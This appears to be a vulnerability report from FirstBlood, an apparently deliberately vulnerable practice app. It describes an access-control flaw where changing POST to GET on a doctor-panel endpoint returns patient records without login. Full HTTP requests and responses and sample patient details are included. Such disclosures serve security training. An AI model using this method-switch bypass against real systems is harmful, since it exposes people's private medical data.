FirstBlood-#114IDOR at http://firstbloodhackers.com:49369/drpanel/drapi/qp.php can be used to query patient data without doctor account
This issue was discovered on FirstBlood v1.0.0



On 2021-05-10, 0xconft Level 5 reported:

Hi there,

I found IDOR at http://firstbloodhackers.com:49369/drpanel/drapi/qp.php where i can use this endpoint to query patient data without logged in by switching the HTTP Method from POST to GET.

PoC. Accessing via POST without cookie will return nothing Request

POST /drpanel/drapi/qp.php HTTP/1.1
Host: firstbloodhackers.com:49369
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

name=sea

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 12:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0

Switch the HTTP method to GET without cookie then the patient data that contain "sea" in he/she names will returned

GET /drpanel/drapi/qp.php?name=sea HTTP/1.1
Host: firstbloodhackers.com:49369
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 10 May 2021 12:17:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 228

Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>

Best Regards, 0xconft

P1 CRITICAL

Endpoint: /drpanel/drapi/qp.php

Parameter: name

Payload: sea


FirstBlood ID: 12
Vulnerability Type: Auth issues

If the request method is changed from POST to GET, then the endpoint /drapi/qp.php becomes available to ANY user due to an application logic error